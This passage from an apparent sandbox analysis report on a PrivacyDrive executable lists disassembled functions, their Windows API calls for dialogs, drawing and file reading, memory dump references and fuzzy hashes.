                                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT,?,?,?,00412591), ref: 00420AB7
                                • _memset.LIBCMT ref: 00420B3F
                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT), ref: 00420B55
                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT), ref: 00420B5F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memsetlstrcat$FileNameOpenlstrcpynlstrlen
                                • String ID: ADD_TO_FAVORITES$CheckBox$Dialog$OPEN_FILE$\
                                • API String ID: 1129419596-541678159
                                • Opcode ID: 401d60ef948c7a465d402e30fac01c54088480a09c38c91bb1510d80beebc875
                                • Instruction ID: 7c5d638c8ad4967e5d53c3804e16a683b9c30670738ba330edc928e4d93e01f9
                                • Opcode Fuzzy Hash: 401d60ef948c7a465d402e30fac01c54088480a09c38c91bb1510d80beebc875
                                • Instruction Fuzzy Hash: AC71DE74A007199FCB20DF55DC49B9BBBF8FF45304F00456AE80993280E7B8AA98CF95
                                Function 00429960 Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 0042996C
                                • EnumFontFamiliesW.GDI32(00000000,00000000,00429950,00000000,name,00000000,00000002,Font\FontName,DEFAULT|PRIORITY_1,?,00000000,00000000,00429B2B,7563D392,?,00000000), ref: 004299E7
                                • EnumFontFamiliesW.GDI32(00000000,00000000,00429950,00000000,name,00000000,00000002,Font\FontName,DEFAULT|PRIORITY_2,Font\FontName,DEFAULT|PRIORITY_1,?,00000000,00000000,00429B2B,7563D392), ref: 00429A63
                                • EnumFontFamiliesW.GDI32(00000000,00000000,00429950,00000000,name,00000000,Font\FontName,DEFAULT|PRIORITY_3,Font\FontName,DEFAULT|PRIORITY_2,Font\FontName,DEFAULT|PRIORITY_1,?,00000000,00000000,00429B2B), ref: 00429AAD
                                • ReleaseDC.USER32(00000000,00000000), ref: 00429AC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: EnumFamiliesFont$Release
                                • String ID: $[$$[$([$([$DEFAULT|PRIORITY_1$DEFAULT|PRIORITY_2$DEFAULT|PRIORITY_3$Font\FontName$name
                                • API String ID: 2372228163-2114572919
                                • Opcode ID: a0da90b5ef834a16701418d2769278927caed07de6752e9ec8dae29241cda6b9
                                • Instruction ID: 63894a0de4745de5f54533c513a582d59f4943c8890529a85303b5c574597c44
                                • Opcode Fuzzy Hash: a0da90b5ef834a16701418d2769278927caed07de6752e9ec8dae29241cda6b9
                                • Instruction Fuzzy Hash: C631AC30301360ABEB785A177C5FFE75D99EB42B62F94042FB60A913D1C75C9C44E26A
                                Function 004A0210 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 106windowsleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(00000000), ref: 004A0221
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004A0242
                                • SendMessageW.USER32(00000000,00000121,00000000,00000000), ref: 004A0260
                                • Sleep.KERNEL32(0000000A), ref: 004A0268
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004A0276
                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004A028A
                                • Sleep.KERNEL32(0000000A), ref: 004A02C1
                                • TranslateMessage.USER32(00000000), ref: 004A02C7
                                • DispatchMessageW.USER32(00000000), ref: 004A02D1
                                • TranslateMessage.USER32(00000000), ref: 004A02FA
                                • DispatchMessageW.USER32(00000000), ref: 004A0304
                                • PostQuitMessage.USER32(00000000), ref: 004A030E
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004A0320
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate$ParentPostQuitSend
                                • String ID: p
                                • API String ID: 3558860194-2181537457
                                • Opcode ID: 3ad98564f9217dad67eb4cc8d1695be8ae595c90c57b1d42db7e0a873f5566b0
                                • Instruction ID: a3fbdd8ff4268c024b1367fc26ad39c1584acc8a4865cc4e2d2fc97986039eed
                                • Opcode Fuzzy Hash: 3ad98564f9217dad67eb4cc8d1695be8ae595c90c57b1d42db7e0a873f5566b0
                                • Instruction Fuzzy Hash: 9A310A31A40309AFEF209BA0CC49FEE7778EB2A711F140466F601E62D0D778A945DB69
                                Function 004183B0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 106windowsleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(00000000), ref: 004183C1
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004183E2
                                • SendMessageW.USER32(00000000,00000121,00000000,00000000), ref: 00418400
                                • Sleep.KERNEL32(00000005,?,?,?,00418332,00000000,?,?), ref: 00418408
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00418416
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041842A
                                • Sleep.KERNEL32(0000000A,?,?,?,00418332,00000000,?,?), ref: 00418461
                                • TranslateMessage.USER32(?), ref: 00418467
                                • DispatchMessageW.USER32(?), ref: 00418471
                                • TranslateMessage.USER32(?), ref: 0041849A
                                • DispatchMessageW.USER32(?), ref: 004184A4
                                • PostQuitMessage.USER32(00000000), ref: 004184AE
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004184C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate$ParentPostQuitSend
                                • String ID: p
                                • API String ID: 3558860194-2181537457
                                • Opcode ID: ad4554fbc41f7c899fdbae2d57b079ac61dafef2fa67099c461952b4773f50a4
                                • Instruction ID: e94e9c10f76434120f8662620c792d8805317a7a4b21368f9c37895cfdad71a7
                                • Opcode Fuzzy Hash: ad4554fbc41f7c899fdbae2d57b079ac61dafef2fa67099c461952b4773f50a4
                                • Instruction Fuzzy Hash: 9B310E31A40309AFEF109BA0DC49FEE7768BB19711F54042AF601E6290EF78A945DB69
                                Function 0049FA10 Relevance: 24.1, APIs: 6, Strings: 10, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA20
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA38
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA65
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA77
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FAA4
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FAB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BASE_DIALOG$BUTTON_BOTTOM$BUTTON_HEIGHT$BUTTON_INTERVAL$BUTTON_RIGHT$DOTLINE_BOTTOM$DOTLINE_HIGH$DOTLINE_LOW$DOTLINE_LR$Dialog
                                • API String ID: 904232820-2733251250
                                • Opcode ID: 4ecdd1dee56623e85ebe5f008afd0818b57f3bbd8557e8fb14c12586452e16f1
                                • Instruction ID: ab4ad8203706a241e30d807307d16b7b1518f7673a2a10b7ca18abe6edba17c8
                                • Opcode Fuzzy Hash: 4ecdd1dee56623e85ebe5f008afd0818b57f3bbd8557e8fb14c12586452e16f1
                                • Instruction Fuzzy Hash: 82312334784702A6EE44A7718C62F666E547B48F55F44023ABB09E62C1EFD8F804C7A9
                                Function 00414940 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 293filewindowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004A6F60: EnterCriticalSection.KERNEL32(005BE2CC,0049B07A,0049B078), ref: 004A7032
                                  • Part of subcall function 004A6F60: LeaveCriticalSection.KERNEL32(?,?,?), ref: 004A70D6
                                  • Part of subcall function 0040D860: _memmove.LIBCMT ref: 0040D911
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00414AE9
                                • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00414B16
                                • GetFileSizeEx.KERNEL32(00010000,?), ref: 00414B3B
                                • CloseHandle.KERNEL32(?), ref: 00414B4D
                                • SetLastError.KERNEL32(00000072,00000000,?), ref: 00414BC8
                                • CloseHandle.KERNEL32(?), ref: 00414BD8
                                • GetLastError.KERNEL32 ref: 00414C37
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414C63
                                • LocalFree.KERNEL32(?), ref: 00414C8F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: File$CloseCriticalErrorHandleLastSection$CreateEnterFormatFreeLeaveLocalMessageReadSize_memmove
                                • String ID: 0007$0029$0036$0049
                                • API String ID: 1440858197-249027932
                                • Opcode ID: e91b2718b8bad974ffd6ca7410dfe79f71b48452929474bb0ac99993b6884a91
                                • Instruction ID: f0adc23a86ddd49354d18f217ef62bd7658484890113a0c4d8c6d7e2c6b58bcc
                                • Opcode Fuzzy Hash: e91b2718b8bad974ffd6ca7410dfe79f71b48452929474bb0ac99993b6884a91
                                • Instruction Fuzzy Hash: 32B19E31244301ABD720DF61C895FAB77E8AF94714F00052EFA569B2D1EB78E884CB5A
                                Function 004169B0 Relevance: 22.8, APIs: 3, Strings: 10, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004169B8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SPLASH), ref: 004169DF
                                • LeaveCriticalSection.KERNEL32(005BDCCC,00000006,CHECKBOX_DONT_SHOW,00000005,MOUNT_DESCRIPTION,00000004,OPEN_DESCRIPTION,00000003,CREATE_DESCRIPTION,00000002,BUTTON_MOUNT,00000001,BUTTON_OPEN,00000000,BUTTON_CREATE,Dialog), ref: 00416A76
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_CREATE$BUTTON_MOUNT$BUTTON_OPEN$CHECKBOX_DONT_SHOW$CREATE_DESCRIPTION$Dialog$MOUNT_DESCRIPTION$OPEN_DESCRIPTION$PZ$SPLASH
                                • API String ID: 2978645861-117737115
                                • Opcode ID: 12ce248860e5816645ae96685624a902db5279d354596f054e2eb9af7a76a84d
                                • Instruction ID: b4d47b6eeb43621f850348c69b08b960bdc31d729547f46b50674d169dabf746
                                • Opcode Fuzzy Hash: 12ce248860e5816645ae96685624a902db5279d354596f054e2eb9af7a76a84d
                                • Instruction Fuzzy Hash: 2211DB7439171123EE5526326D2BBEF1C466B55F45F05041AFB01EA2C2FFDACD8282AE
                                Function 0042D510 Relevance: 22.8, APIs: 15, Instructions: 292windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateRegion.GDIPLUS ref: 0042D569
                                • GdipGetClip.GDIPLUS(?,?), ref: 0042D58D
                                • GdipSetClipRectI.GDIPLUS(?,00000000,00000000,?,?,00000004), ref: 0042D5B5
                                • GdipCreatePath.GDIPLUS(00000000,?), ref: 0042D5D7
                                • GdipCreatePathGradientFromPath.GDIPLUS(?,?), ref: 0042D665
                                • GdipSetPathGradientFocusScales.GDIPLUS(?,?,?,7563D392), ref: 0042D6DA
                                • GdipFillPath.GDIPLUS(?,?,?,?,?,7563D392), ref: 0042D6FE
                                • GdipSetClipRegion.GDIPLUS(?,?,00000000,?,?,7563D392), ref: 0042D720
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0042D744
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,00000064,00000019,?,00000064,?,FF414141,00000000,00000000,?,?,?,?,00000000), ref: 0042D7D6
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0042D7FC
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000008,0000001D,?,?,?,FF414141,?,00000008,00000008,?,?,FF414141), ref: 0042D8BA
                                • GdipDeleteBrush.GDIPLUS(?), ref: 0042D8D1
                                • GdipDeletePath.GDIPLUS(?), ref: 0042D8E0
                                • GdipDeleteRegion.GDIPLUS(?), ref: 0042D8F2
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Path$CreateDeleteFormatString$ClipRegion$AlignGradient$BrushFillFocusFromLineRectScales
                                • String ID:
                                • API String ID: 3976200767-0
                                • Opcode ID: 856bd7b8fd2f43be429881904b70c3a87543154a6d411990ca30d853c1daf611
                                • Instruction ID: 438f0d58572181c0c9f278595c685e5d405f47503ee238b1893350e076efd6a8
                                • Opcode Fuzzy Hash: 856bd7b8fd2f43be429881904b70c3a87543154a6d411990ca30d853c1daf611
                                • Instruction Fuzzy Hash: 9CC157B1608341AFE711CF24C845B5BBBE8FF99314F104A1EF9A5972A0D770E948CB56
                                Function 004352D0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 004352E0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 004352F8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog\Button,?,SPLASH|CLOSE,?,?,?,00435460), ref: 00435325
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 00435337
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog\Button,?,SPLASH|CLOSE,?,?,?,00435460), ref: 00435364
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,00435460), ref: 00435376
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog\Button$IMG_HIT$IMG_NORMAL$IMG_PUSH$PM_HEIGHT$PM_RIGHT$PM_TOP$PM_WIDTH$SPLASH|CLOSE
                                • API String ID: 904232820-1171755522
                                • Opcode ID: a3294f2705f154f8f036b536cae1ebb6c065207f2ae3daecc49b24937574667b
                                • Instruction ID: f7248e3511a0334548e6fba1859fd11e6aa3f2101fc69f97611eb1fe6e9bcd4c
                                • Opcode Fuzzy Hash: a3294f2705f154f8f036b536cae1ebb6c065207f2ae3daecc49b24937574667b
                                • Instruction Fuzzy Hash: CB31A270380701A7D614A7729D42FEB6A94BB24B05F44402BB74A972D1FFE8F940DA65
                                Function 004580E0 Relevance: 21.2, APIs: 14, Instructions: 227COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePath.GDIPLUS(00000000,7563D392,7563D392,?,00000000,7563D392,005429F8,000000FF,?,00457F77,00000000,00000000,?), ref: 0045811A
                                • GdipResetPath.GDIPLUS(00000000,?,00000000), ref: 0045819B
                                • #1.GDIPLUS(00000000), ref: 004581CA
                                • GdipGetPathLastPoint.GDIPLUS(00000000,?), ref: 004581E8
                                • GdipResetPath.GDIPLUS(00000000), ref: 00458216
                                • #1.GDIPLUS(00000000), ref: 00458248
                                • GdipGetPathLastPoint.GDIPLUS(00000000,?), ref: 00458260
                                • GdipResetPath.GDIPLUS(00000000), ref: 0045828E
                                • #1.GDIPLUS(00000000), ref: 004582C2
                                • GdipGetPathLastPoint.GDIPLUS(00000000,00000000), ref: 004582DA
                                • GdipResetPath.GDIPLUS(00000000), ref: 00458314
                                • #1.GDIPLUS(00000000), ref: 0045834B
                                • GdipGetPathLastPoint.GDIPLUS(00000000,00000000), ref: 00458363
                                • GdipDeletePath.GDIPLUS(00000000), ref: 0045841F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipPath$LastPointReset$CreateDelete
                                • String ID:
                                • API String ID: 2820090972-0
                                • Opcode ID: 2f990baf44bd20d73e386656a5ba6041f534ae142c86b67bb0f298a9baee9ea4
                                • Instruction ID: 4a4483b2e7dc2c645fc89ccffc9d9223d29021c5c56857fdb135a8fbe4f2e15f
                                • Opcode Fuzzy Hash: 2f990baf44bd20d73e386656a5ba6041f534ae142c86b67bb0f298a9baee9ea4
                                • Instruction Fuzzy Hash: 7BB1E731E04709DFDB02CFBAC9506AEFBB4BF59341F149719E801B22A0E73169949F90
                                Function 004034A0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 226windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004A5820: wsprintfW.USER32 ref: 004A584E
                                  • Part of subcall function 004A5820: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004A586D
                                • CloseHandle.KERNEL32(?,7563D392), ref: 0040375D
                                  • Part of subcall function 00477320: DeviceIoControl.KERNEL32(?,07770C2C,00000000,00000000,00000000,00000004,?,00000000), ref: 0047734C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403536
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403565
